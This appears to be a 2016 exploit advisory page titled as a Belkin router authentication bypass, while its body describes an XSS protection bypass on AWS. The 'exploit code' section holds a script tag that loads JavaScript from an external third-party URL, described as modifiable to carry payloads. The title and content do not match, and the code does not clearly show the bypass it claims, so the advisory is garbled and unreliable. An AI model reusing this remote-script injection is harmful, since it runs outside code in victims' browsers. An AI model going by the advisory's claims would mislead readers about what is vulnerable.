Home / os / winmobile

Belkin Router AC1200 Authentication Bypass

Posted on 12 July 2016

Exploit Author: Ajay Gowtham Vendor: ========================== http://aws.amazon.com/ Amazon Web Services, is a subsidiary of Amazon.com, which offers a suite of cloud computing services that make up an on-demand computing platform. These services operate from 12 geographical regions across the world. Vulnerability Type: ====================== XSS PROTECTION BYPASS Vulnerability Details: ===================== The html file is uploaded into the AWS Cloud with the html and injected .js scripts as given below and external js is called from the third party site. Which injects the payload on the cloud and executes into the user interface bypassing the XSS protection filters. As per the need of scope of attack the .js can be modified to handle the requests and payloads Exploit code(s): =============== //external JS script Ref: https://github.com/ajaygowtham/xss/blob/master/try.js //Uploaded .html file in the cloud ----------------------script goes on here------------------------------------------- <script src="https://github.com/ajaygowtham/xss/blob/master/try.js "></script> <script> //Here it goes on :) var html = filterXSS('Ajay Gowtham'); alert(html); </script> ---------------------end----------------------------------------------------------- References: ================================= https://cwe.mitre.org/data/definitions/79.html Exploitation Technique: ======================= Local POC: ======================== https://drive.google.com/folderview?id=0B2p8gG1WpnRnSFRrR1RJWUh0Qjg&usp=sharing [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. AJOXR

 

TOP